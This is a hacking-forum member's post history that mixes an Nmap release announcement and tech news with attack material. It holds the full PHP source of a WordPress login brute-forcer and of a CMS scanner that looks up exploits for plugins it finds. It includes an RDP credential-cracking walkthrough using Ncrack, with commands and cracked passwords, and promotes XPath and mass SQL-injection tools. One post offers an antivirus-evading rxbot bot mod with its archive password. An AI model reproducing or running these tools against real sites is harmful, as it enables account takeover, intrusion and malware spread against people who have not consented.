Fi8sVrs (Active Members) - Posts: 3,206 - Days Won: 87
Everything posted by Fi8sVrs

  1. playlist.ro
  2. first come, first served?
  3. Cura is a mobile phone application bundle of remote systems administration tools. It provides a personalized terminal emulator, a syslog module that reads logs directly from a server, a SysMonitor module that visually graphs CPU and RAM usage percentages, access to Nmap, and a Server Stats module that offers general server information such as vitals, hardware information, memory information, processes, and so on. A security feature allows users to have Cura's database completely wiped by sending the compromised phone a secret pattern of their choosing (e.g. send an SMS message containing "phone has been stolen!" to your Android phone to wipe Cura's database, and receive the location of the compromised phone as an SMS to your emergency phone number or as an email to your emergency email address). Changes: This release satisfies all the tasks promised: terminal, syslog reader, SysMonitor (for CPU and RAM), Nmap, and server stats. In addition, there's the security feature (an SMS can wipe Cura's database, and the phone's location is sent back). It works on Android 2.3.3 (Gingerbread) and above. Download Cura 1.0 | Packet Storm
  4. YouTube views, subscribers, comments, likes; Facebook likes, fans, subscribers.
  5. File Name: CUSTOM_101m2.exe
File Size: 634980 Bytes
MD5: 62c1dc4a6e09a9de77613abc2443d074
SHA1: 07363658dea4e08e949857b59ac86edfc64eda0f
Detection: 0 of 37 (0%)
Status: CLEAN
AVG Free - Clean! ArcaVir - Clean! Avast 5 - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! VirusBuster Internet Security - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Rising Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Vexira Antivirus - Clean! Webroot Internet Security - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! AhnLab V3 Internet Security - Clean! BullGuard - Clean! Immunet Antivirus - Clean! VIPRE - Clean!
rar pass: {-98,-124,74,-126,-62,68,0}; the decryption of the mod, namely: rxbot/Pitbull (Cifra); download via rootarea
  6. http://www.mediafire.com/?bebma0vbh1w31eb http://www.mediafire.com/?v1nm68ui45b71by http://www.mediafire.com/?qf39isbqud6l8sw http://www.mediafire.com/?3gmmu4o50yppjje http://www.mediafire.com/?jkcxcce4oobc9w9 http://www.mediafire.com/?n5b9mud3d8v4oid http://www.mediafire.com/?wpfox8sfu2rnhkd http://www.mediafire.com/?d4cc8sw5a4ct766 http://www.mediafire.com/?2f6943de4kcmstv http://www.mediafire.com/?cpzaabkaz4b2jn3 http://www.mediafire.com/?6jsmu8camlkks5y http://www.mediafire.com/?rwa0rcegwcii0fj http://www.mediafire.com/?s47ma6j3gbkpkko http://www.mediafire.com/?evbjq1bmcy3175r http://www.mediafire.com/?c1njusq3gk05p8m http://www.mediafire.com/?84q28ft3z70o7sl http://www.mediafire.com/?3s1l4miam52pjy6 http://www.mediafire.com/?k6nabo06u8jqhur http://www.mediafire.com/?7p4bicilto3rzmb http://www.mediafire.com/?11pmca1sd7h3k6r http://www.mediafire.com/?l3hxi0h4lgdq0sx http://www.mediafire.com/?1s2j2ocrc2rv9o0 http://www.mediafire.com/?u1a12ive0962pi4 http://www.mediafire.com/?naimi5iqm858iss http://www.mediafire.com/?r51zdz5ek3m22jp http://www.mediafire.com/?icdro42rd2lieh9 http://www.mediafire.com/?ykrh99g5q4h7olr http://www.mediafire.com/?dj9lm9l07z9nndj http://www.mediafire.com/?c3ea6kyw2owfzgn http://www.mediafire.com/?h55ts54fv1z0u5x http://www.mediafire.com/?9vi4wbkoc2yhnxa http://www.mediafire.com/?k1dy2x9apd2joek http://www.mediafire.com/?3bchz0bv373lrxd http://www.mediafire.com/?mmr6onclrx5x7bu http://www.mediafire.com/?5c2cghv3gh9213o http://www.mediafire.com/?xbjgk5a5ivb1cff http://www.mediafire.com/?bujh1stoblub95z http://www.mediafire.com/?c67u75pgmv5en7o http://www.mediafire.com/?2hla1637m2tt152 http://www.mediafire.com/?cep9kef3dvvk9c0 http://www.mediafire.com/?fcd54b8t8dwzmes http://www.mediafire.com/?g83gb2p2kcut2kx http://www.mediafire.com/?o2xw44tgvzjnb4y http://www.mediafire.com/?maswyebb2crtg35 http://www.mediafire.com/?hny1tv45o9wlz97 http://www.mediafire.com/?hny1tv45o9wlz97 http://www.mediafire.com/?3cqt8to4jde7b69 http://www.mediafire.com/?2fyxnbv7bb6wazt http://www.mediafire.com/?1l91k1szbua2u0q http://www.mediafire.com/?sr12ed4en7tawyw http://www.mediafire.com/?fexif1cs31pjf03 http://www.mediafire.com/?gc6sang2dn5h65m http://www.mediafire.com/?5ggsxk3htrn8cbk http://www.mediafire.com/?v5ljossglspus5d Source r00tw0rm
  7. May 21, 2012 - The Nmap Project is pleased to announce the immediate, free availability of the Nmap Security Scanner version 6.00 from nmap.org (Nmap - Free Security Scanner For Network Exploration & Security Audits). It is the product of almost three years of work, 3,924 code commits, and more than a dozen point releases since the big Nmap 5 release in July 2009. Nmap 6 includes a more powerful Nmap Scripting Engine, 289 new scripts, better web scanning, full IPv6 support, the Nping packet prober, faster scans, and much more! We recommend that all current users upgrade.

Before we go into the detailed changes, here are the top 6 improvements in Nmap 6:

1. NSE Enhanced: The Nmap Scripting Engine (NSE) has exploded in popularity and capabilities. This modular system allows users to automate a wide variety of networking tasks, from querying network applications for configuration information to vulnerability detection and advanced host discovery. The script count has grown from 59 in Nmap 5 to 348 in Nmap 6, and all of them are documented and categorized in our NSE Documentation Portal. The underlying NSE infrastructure has improved dramatically as well. [More details]

2. Better Web Scanning: As the Internet has grown more web-centric, Nmap has developed web scanning capabilities to keep pace. When Nmap was first released in 1997, most of the network services offered by a server listened on individual TCP or UDP ports and could be found with a simple port scan. Now, applications are just as commonly accessed via URL path instead, all sharing a web server listening on a single port. Nmap now includes many techniques for enumerating those applications, as well as performing a wide variety of other HTTP tasks, from web site spidering to brute force authentication cracking. Technologies such as SSL encryption, HTTP pipelining, and caching mechanisms are well supported. [More details]

3. Full IPv6 Support: Given the exhaustion of available IPv4 addresses, the Internet community is trying to move to IPv6. Nmap has been a leader in the transition, offering basic IPv6 support since 2002. But basic support isn't enough, so we spent many months ensuring that Nmap version 6 contains full support for IP version 6. And we released it just in time for the World IPv6 Launch. We've created a new IPv6 OS detection system, advanced host discovery, raw-packet IPv6 port scanning, and many NSE scripts for IPv6-related protocols. It's easy to use, too: just specify the -6 argument along with IPv6 target IP addresses or DNS records. In addition, all of our web sites are now accessible via IPv6. For example, Nmap.org can be found at 2600:3c01::f03c:91ff:fe96:967c. [More details]

4. New Nping Tool: The newest member of the Nmap suite of networking and security tools is Nping, an open source tool for network packet generation, response analysis and response time measurement. Nping can generate network packets for a wide range of protocols, allowing full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts, it can also be used as a raw packet generator for network stack stress testing, ARP poisoning, Denial of Service attacks, route tracing, etc. Nping's novel echo mode lets users see how packets change in transit between the source and destination hosts. That's a great way to understand firewall rules, detect packet corruption, and more. [More details]

5. Better Zenmap GUI & results viewer: While Nmap started out as a command-line tool and many (possibly most) users still use it that way, we've also developed an enhanced GUI and results viewer named Zenmap. One addition since Nmap 5 is a "filter hosts" feature which allows you to see only the hosts which match your criteria (e.g. Linux boxes, hosts running Apache, etc.). We've also localized the GUI to support five languages besides English. A new script selection interface helps you find and execute Nmap NSE scripts. It even tells you what arguments each script supports. [More details]

6. Faster scans: In Nmap's 15-year history, performance has always been a top priority. Whether scanning one target or a million, users want scans to run as fast as possible without sacrificing accuracy. Since Nmap 5 we've rewritten the traceroute system for higher performance and increased the allowed parallelism of the Nmap Scripting Engine and version detection subsystems. We also performed an intense memory audit which reduced peak consumption during our benchmark scan by 90%. We made many improvements to Zenmap data structures and algorithms as well, so that it can now handle large enterprise scans with ease. [More details]

Screen shots (in the original announcement): Nmap 6 provides a wealth of information about remote systems, as shown in a sample scan against a machine we maintain for scan testing purposes (scanme.nmap.org); an example using Zenmap against a couple of production web servers (Nmap.org and Reddit); and, perhaps the most visually appealing aspect of Zenmap, its network topology mapper, used to interactively explore the routes between a source machine and more than a dozen popular web sites.

Download and Updates: nmap.org
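To get a feel for the new features from the command line, a few illustrative invocations (these are not from the announcement itself; scanme.nmap.org is the project's designated scan-testing host mentioned above, and the flags follow the standard Nmap/Nping documentation):

nmap -6 scanme.nmap.org   (a plain scan over IPv6; improvement 3)
nmap -sV --script http-enum scanme.nmap.org   (version detection plus NSE web application enumeration; improvements 1 and 2)
nping --tcp -p 80 --flags syn scanme.nmap.org   (a raw TCP SYN probe with Nping; improvement 4)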
  8. Name: Napsters Wordpress Brute Forcer. Coded in: PHP. Developed by: Dr-Freak. Using this you can brute-force any WordPress blog. You can paste your password list into the form in the script, or just upload your big list to the same directory and rename it to napster.txt. The script also writes a file, nap.txt, holding every password combination tried so far; this is just to keep track of the last password the script attempted. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>W0rdPress Brute Forcer [#] Napsters Cr3w</title> <style type="text/css"> <!-- body { background-color: #000000; } .style2 {color: #FF0000} .style3 {font-family: Verdana, Arial, Helvetica, sans-serif} .style4 { font-size: 67px; font-weight: bold; color: #FFFFFF; font-family: Arial, Helvetica, sans-serif; } .style7 { font-weight: bold; color: #FFFFFF; font-size: 67px; font-family: Verdana, Arial, Helvetica, sans-serif; } .style8 { font-size: 24; color: #FF0000; } .style67 { font-size: 24; color: #FFFFFF; } --> </style></head> <body> <div align="center" class="style3"> <h1 class="style7">WordPress Brute Forcer</h1> <p><span class="style4"><span class="style2">Napsters Cr3w & 0xf</span></span></p> <p><span class="style8">Develop By Dr-Freak</span></p> </div> </body> <span class="style67"><center>Gr3tx T0 Virus Hima . Red Virus . MrCreepy . The Lions Heart . Max0xf . Seeker . Hex786 . Mkhan Swati . All 0xf members</center></span> <p> </p> </html> <?php /** * @author dr.freak *@copyright 2012 */ function login ($url,$user,$pass){ $login = $url.'/wp-login.php'; $to = $url.'/wp-admin'; $data = array('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>'Log In','redirect_to'=>$to,'testcookie'=>1); $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$login); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$data); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $resutl = curl_exec($ch); curl_close($ch); if(eregi ('<div id="login_error">',$resutl)) { return false; }else{ return true; } } function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } $a=GetIP(); echo '<span class="style8"><center>Your IP : '; echo "$a<br></center></span>"; if (!isset($_GET['star'])) { echo '<center><form method="post" action="?star"> <span class="style8">Target </span> : <input name="target" type="text" value="http://www. "size="40"><brr /> <span class="style2">Username </span> : <input name="username" type="text"><br /> <input type="checkbox" name="list" value="Yes" /> <span class="style8">[#]Tick If Y0u Want To Brute Via txt Litst </span> <span class="style8">Upload Txt List As napster.txt In Same Dir<br/> </span> <span class="style8">Passwords </span> : <br><textarea cols="50" rows="5" name="passwords"></textarea><br /> <input type="submit" value="submit"> </form></center>'; } else{ if(isset($_POST['list']) && $_POST['list'] == 'Yes') { $fileName='napster.txt'; if(file_exists($fileName)) { $file = fopen($fileName,'r'); while(!feof($file)) { $name = fgets($file); $passwords = $name; $fileName1='nap.txt'; $file1 = fopen($fileName1,'a'); fwrite( $file1, "$passwords\n"); $username = $_POST['username']; $target = $_POST['target']; if (login($target,$username,$passwords)) { echo '<span class="style8"><center>Target : '; echo " : $target <br /> Username : $username <br />Password : $passwords<br/></span>"; break; } } fclose($file); } } else { $passwords = $_POST['passwords']; $username = $_POST['username']; $target = $_POST['target']; $ex = explode("\n",$passwords); foreach($ex as $passwords) { $fileName1='nap.txt'; $file1 = fopen($fileName1,'a'); fwrite( $file1, "$passwords\n"); if (login($target,$username,$passwords)) { echo '<span class="style8"><center>Target : '; echo " : $target <br /> Username : $username <br />Password : $passwords<br/></span>"; break; } } } } echo '<br><span class="style67"><center>C0ded @ Dr-Freak Labs</center></span>'; ?> Download mirror: wordpress bruteforce.php. Usage: target: http://example.com/blog/wp-login.php. Source: r00tw0rm.com
  9. CC

    report @ efrauda.ro - file a complaint
  10. 1337scan_v0.2.php <?php @set_time_limit(0); @error_reporting(0); /*******************************************************************************/ # Script : [+]~ 1337 Multiple CMS Scaner Online | ToolKit | v0.2 by KedAns-Dz ~[+] # Author : ked-h [ at ] hotmail [ dot ] com # Home : www.1337day.com # Greets to : Dz Offenders Cr3W - Algerian Cyber Army - Inj3ct0r Team /****************************************************************************/ // Script Functions , start ..! function ask_exploit_db($component){ $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($exploitdb); if (eregi("No results",$result)) { echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>"; }else{ echo"<td><a href='$exploitdb'>Found ..!</a></td><td><--</td></tr>"; } } /**************************************************************/ /* Joomla Conf */ function get_components($site){ $source = @file_get_contents($site); preg_match_all('{option,(.*?)/}i',$source,$f); preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2); preg_match_all('{/components/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $comm){ echo "<tr><td>$comm</td>"; ask_exploit_db($comm); } } /**************************************************************/ /* WP Conf */ function get_plugins($site){ $source = @file_get_contents($site); preg_match_all("#/plugins/(.*?)/#i", $source, $f); $plugins=array_unique($f[1]); if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach($plugins as $plugin){ echo "<tr><td>$plugin</td>"; ask_exploit_db($plugin); } } /**************************************************************/ /* Nuke's Conf */ function get_numod($site){ $source = @file_get_contents($site); preg_match_all('{?name=(.*?)/}i',$source,$f); preg_match_all('{?name=(.*?)(&|&|l_op=")}i',$source,$f2); preg_match_all('{/modules/(.*?)/}i',$source,$f3); $arz=array_merge($f2[1],$f[1],$f3[1]); $coms=array(); if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $nmod){ echo "<tr><td>$nmod</td>"; ask_exploit_db($nmod); } } /*****************************************************/ /* Xoops Conf */ function get_xoomod($site){ $source = @file_get_contents($site); preg_match_all('{/modules/(.*?)/}i',$source,$f); $arz=array_merge($f[1]); $coms=array(); if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... 
check it .</td></tr>";} foreach(array_unique($arz) as $x){ $coms[]=$x; } foreach($coms as $xmod){ echo "<tr><td>$xmod</td>"; ask_exploit_db($xmod); } } /**************************************************************/ /* Header */ function t_header($site){ echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">'; echo' <tr id="oo"> <td>Site : <a href="'.$site.'">'.$site.'</a></td> <td>Exploit-db</b></td> <td>Exploit it !</td> </tr> '; } ?> <html> <head> <meta http-equiv="Content-Language" content="fr"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>[+]~ 1337 Multiple CMS Scaner Online | ToolKit | v0.2 by KedAns-Dz ~[+]</title> <style> body,input,table,select{background: black; font-family:Verdana,tahoma; color: #008000; font-size:12px; } a:link,a:active,a:visited{text-decoration: none;color: red;} a:hover {text-decoration: underline; color: red;} table,td,tr,#gg{ border-style:solid; text-decoration:bold; } tr:hover,td:hover{background-color: #FFFFCC; color:green;} .oo:hover{background-color: black; color:white;} </style> </head> <body> <p align="center"> </p> <p align="center"> </p> <p align="center"> </p> <form method="POST" action=""> <p align="center"> </p> <p align="center"> <font size="4">[+]~ 1337 Multiple CMS Scaner Online | ToolKit | v0.2 by KedAns-Dz ~[+]</font></p> <p align="center"> <font size="4"><br></font></p> <p align="center">Site : <input type="text" name="site" size="33" value="http://www.site.com/"><select size="1" name="what"> <option>Wordpress</option> <option>Joomla</option> <option>Nuke's</option> <option>Xoops</option> </select><input type="submit" value="Scan"></p> </form> <? // Start Scan :P ... if($_POST){ $site=strip_tags(trim($_POST['site'])); t_header($site); echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):""; echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):""; echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):""; echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):""; } ?> </table> <p align="center"> KedAns-Dz | www.1337day.com | Made in Algeria 2012 ©</p> </body> </html> <? #~End ..! All Right Reserved To ked-h [At] Hotmail [d0t] Com | and www.1337day.com ?> readme.txt.txt 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ################################################################# 1 0 [ 1337 Multiple CMS Scaner Online | ToolKit | v0.2 by KedAns-Dz ~ ] 1 1 ################################################################# 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 > Author : ked-h [ at ] hotmail [ dot ] com > Home : www.1337day.com > Greets to : Dz Offenders Cr3W - Algerian Cyber Army - Inj3ct0r Team > Copyright (c) 2012 | KedAns-Dz | Inj3ct0r 1337day Exploit Database source
  11. DISCLAIMER: All information provided is for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potentially damaging if used inappropriately. All characters and data written in this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such as SSH and VNC, are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let's suppose that we are in the middle of a penetration testing session at the "MEGACORP" offices and we have already tried all the available remote attacks with no luck. We also tried ARP poisoning the LAN, hoping to capture usernames and passwords, without success. From a previous nmap scan log we found a few Windows machines with the RDP port open, and we decided to investigate this possibility further.

First of all we need some valid usernames, so that we only have to guess the passwords rather than both. We found the names of the IT guys on various social networking websites. These are the key IT staff:

jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine

It didn't take long to create valid usernames following the common standard of using the first letter of the first name and the entire surname:

jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine

Software required: a Linux machine, preferably Ubuntu; nmap and a terminal server client:

sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev

About Ncrack: Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's, and many more. Protocols supported include RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, and telnet. (Ncrack - High-speed network authentication cracker)

Installation:

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Information gathering: let's find out which hosts in the network are up, and save them to a text list. The regular expression parses and extracts only the IP addresses from the scan.

Nmap ping scan (goes no further than determining if a host is online):

nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan, with input from the list of hosts/networks:

nmap -F -iL 192.168.56.0.txt

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST
Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the Microsoft terminal service port (3389) open. Looking more in depth at the services available on 192.168.56.10, we can assume that this machine might be the domain controller, and it's worth trying to pwn it. At this point we need to create a file (my.usr) with the probable usernames previously gathered:

vim my.usr
jtagle
jfeagins
hduchene
trestrepo
kmissildine

We also need a file (my.pwd) for the passwords; you can look on the internet for common passwords and wordlists:

vim my.pwd
somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1

At this point we run Ncrack against the 192.168.56.10 machine:

ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST
Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however, the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however, the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however, the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however, the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'
rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0
Ncrack finished.

We can see from the Ncrack results that all the usernames gathered are valid, and we were also able to crack the login credentials, since weak passwords were in use. Four of the IT staff have some kind of logon restriction on the machine; hduchene, however, might be the domain administrator, so let's find out. Run the terminal server client from the Linux box:

tsclient 192.168.56.10

Use Hugh Duchene's credentials ('hduchene' 'passw0rd') and BINGO!!! At this point we have control of the entire MEGACORP domain: unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse the protected network resources, install backdoors and rootkits, and more.

source: Remote desktop credentials audit with Ncrack | Eclectic Security
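As a side note, the username convention used above (first letter of the first name plus the entire surname) is trivial to script when the staff list grows. A minimal Python sketch, not part of the original article, using the fictitious names from this post:

names = ["jessie tagle", "julio feagins", "hugh duchene", "darmella martis",
         "lakisha mcquain", "ted restrepo", "kelly missildine"]
for n in names:
    parts = n.split()
    # first letter of the first name + entire surname: "jessie tagle" -> "jtagle"
    print parts[0][0] + parts[-1]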
  12. XCat is a command line program that aids in the exploitation of XPath injection vulnerabilities. It boasts a wide range of features and can utilize the more advanced features of the XPath 2.0 specification (pattern matching, unicode normalization, and even HTTP requests), or gracefully degrade to XPath 1.0 if they are not available. XCat is built to exploit boolean XPath injections (where only one bit of data can be extracted per request), and it requires you to identify the injection manually first; it does not do that for you.

Features:
- Exploits both GET and POST attacks
- Extracts all nodes, comments, attributes and data from the entire XML document
- Small and lightweight (only dependency is Twisted)
- Parallel requests
- XPath 2.0 supported (with graceful degrading to 1.0)
- Regex pattern matching to reduce character search space
- Unicode normalization
- Advanced data postback through HTTP (see below)
- Arbitrarily read XML files on the server's file system via the doc() function (see below)

Source here

usage: xcat.py [-h] [--method {GET,POST}] [--arg POST_ARGUMENT] [--true TRUE_KEYWORD | --false FALSE_KEYWORD | --error ERROR_KEYWORD] [--true-code TRUE_CODE | --false-code FAIL_CODE | --error-code ERROR_CODE] [--schema-only] [--quotecharacter QUOTE_CHARACTER] [--executequery EXECUTEQUERY] [--max_search SEARCH_LIMIT] [--timeout TIMEOUT] [--stepsize STEP_SIZE] [--normalize {NFD,NFC,NFDK,NFKC}] [--xversion {1,2,auto}] [--lowercase] [--regex] [--connectback] [--connectbackip CONNECTBACK_IP] [--connectbackport CONNECTBACK_PORT] [--notfoundstring NOTFOUNDCHAR] [--fileshell] [--getcwd] [--useragent USER_AGENT] [--timeit] URL

via: XCat - exploitation of XPath injection vulnerabilities | lo0.ro
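For context, the XPath 2.0 features referred to above look roughly like this (illustrative expressions with made-up node names; these are not XCat commands):

doc('file:///var/www/app/users.xml')/*   (loads another XML document from the server's file system)
matches(/users/user[1]/name, '^adm')   (regex pattern matching, returning true/false, i.e. one bit per request)
normalize-unicode(/users/user[1]/name)   (unicode normalization of a string value)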
  13. We're in a bit of a rut right now when it comes to exciting hardware innovations in smartphones. When the iPhone hit the scene in 2007, it was the touchscreen that saw it revolutionize the cellular landscape. Now, the next disruptive feature appears to be just around the corner, as flexible displays are getting mass produced in a big way. Here's the heart of it, reported by The Korea Times' Kim Yoo-chul: That little tidbit certainly teases the imagination, especially when you consider that Samsung happens to be one of Apple's largest suppliers for displays and even certain chips, and that Samsung has been investing heavily in flexible display tech. Nearly a million screens is a whole hell of a lot, and a number that large has some people thinking they'll end up in a 2013 iPhone. Sure, that's entirely possible, especially if the screens are the best option on the table. But a flexible display in an iPhone does not a flexible iPhone make. While this is a strong indication that Samsung feels like its bendy OLED tech is ready for primetime, a smartphone is more than just a display and would need a flexible body and internals to match (and in a way that met Apple's high-performance demands). That, and why would Samsung simply give up what could be a defining innovation in technology when it could launch it first in a phone of its own? Samsung has the chops. Only time will tell where all those flexible displays end up. Some may just be replacing LCDs and other screens in current gadgets. Again from the same report by Korea Times, talking to Samsung Electronics Vice Chairman Kwon Oh-hyun: The flexibility of Samsung's OLED display may spark the imagination, but it sounds like the screen tech is just a superior product compared with traditional LCDs. That makes sense. They'd be more durable by virtue of having some give to them, and "thinner and brighter" never hurts. So, iPhones in 2013 with flexible displays? Entirely possible. With flexible everything else? Well, we're thinking not as likely. Even if we don't see flexible phones being sold in stores next year en masse, you can bet your boots that Samsung and others will do something with this tech, maybe even putting it into something wearable. Via: Rumor: 2013 could bring iPhones with flexible displays | DVICE
  14. eBay isn't allowed around here
  15. there are even nicer ones https://www.google.ro/search?q=adidas%20red%20caps&um=1&ie=UTF-8&hl=ro&tbm=isch&source=og&sa=N&tab=wi&ei=WIqqT8nlCIaeOtf_yOgM&biw=1124&bih=706&sei=joqqT6W7CoqDOs3K9OgM
  16. The script has the following features:
1. Crawling: it can crawl all or a requested number of pages on a website
2. Reverse IP Look-Up: it can find all sites hosted on a shared hosting server
3. Single-Mode Attack: crawl and find SQLi on a single website and report
4. Mass-Mode Attack: find all sites hosted on a domain, crawl them one by one, find SQLi on each in turn, and report
5. Targets can be skipped while crawling if found too big or irrelevant. The script cannot be paused, but the current target can be skipped to move on to the next site.

The script was developed as part of a Penetration Test assessment where a Mass-Mode attack was required per the client's request.

The Banner:
# ./Domain-SQLi-finder.py

Script Help:
# ./Domain-SQLi-finder.py -h

Single-Mode Attack - targeting a single website:
# ./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt

It crawls all or the requested number of pages, finds injectable links, finds injectable parameters, and tests SQLi payloads against each injectable parameter.

